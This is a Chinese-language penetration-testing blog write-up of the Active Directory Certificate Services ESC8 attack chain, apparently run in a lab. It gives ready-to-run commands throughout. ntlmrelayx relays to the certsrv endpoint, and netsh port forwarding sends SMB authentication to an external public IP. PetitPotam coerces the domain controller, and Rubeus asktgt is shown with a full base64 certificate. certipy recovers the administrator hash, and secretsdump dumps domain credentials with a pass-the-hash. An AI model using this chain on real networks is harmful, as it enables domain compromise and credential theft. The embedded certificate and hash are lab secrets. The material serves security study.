ADCS ESC8 攻击链路

前言：ADCS ESC8的攻击链路，这边简单的记录下

参考文章：https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/
参考文章：https://cloud.tencent.com/developer/article/1873728
参考文章：https://github.com/fortra/impacket/pull/1101
参考文章：https://github.com/bats3c/ADCSPwn
参考文章：https://www.cnblogs.com/zpchcbd/p/12199386.html

ESC8

ESC8是一个http的ntlm relay，原因在于ADCS的认证中支持ntlm认证。

被控机器能与域控通信且被控机器可出网的情况

被控机器为windows的情况

域控服务器：192.168.75.202 win
证书服务器：192.168.75.156 win
域机器（被控制）：192.168.75.158
外网服务器：43.143.107.163

proxychains4 python3 ntlmrelayx.py -t http://192.168.75.156/certsrv/certfnsh.asp -smb2support --adcs --template DomainController --no-http-server --smb-port 3446

由于运营商的问题，外网的445端口无法直接进行通信。这边解决的方法就是本地转发两次，第一次通过divertTCPConn将本地445转发到8445，然后通过netsh将8445转发到外网服务器的3446端口上面。

divertTCPConn.exe 445 8445 debug
netsh interface portproxy add v4tov4 listenport=8445 connectaddress=43.143.107.163 connectport=3446

接着通过PetitPotam来进行中继利用，如下图所示

python3 PetitPotam.py 192.168.75.158 192.168.75.202

中继到证书颁发机构进行身份验证，如下图所示

这边在192.168.75.158服务器上面通过rubeus直接注入会报错，报错的原因是rubeus新版还需要一个password的参数，这个我原因自己是知道的，但是不知道如何解决（编译旧版可能可以进行解决，但是这边没有通过这个方法），所以我就换了另外一个方法，继续看下面

Rubeus.exe asktgt /user:WIN-MG4C5QO445H$ /certificate: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 /ptt

这边解决的方法，我是直接在cyber解密网站中将上面拿到的base64的证书进行解码为pfx文件进行保存，如下图所示

接着直接用certipy来进行请求获取administrator的哈希值如下图所示

proxychains4 certipy auth -pfx test.fpx -dc-ip 192.168.75.202

这边可以用impacket来进行测试这个administrator的哈希值是否正确，如下图所示

proxychains4 python3 secretsdump.py WIN-MG4C5QO445H\$@192.168.75.202 -hashes aad3b435b51404eeaad3b435b51404ee:791ae161bd7a79b3c83d8d5e10305dfd -just-dc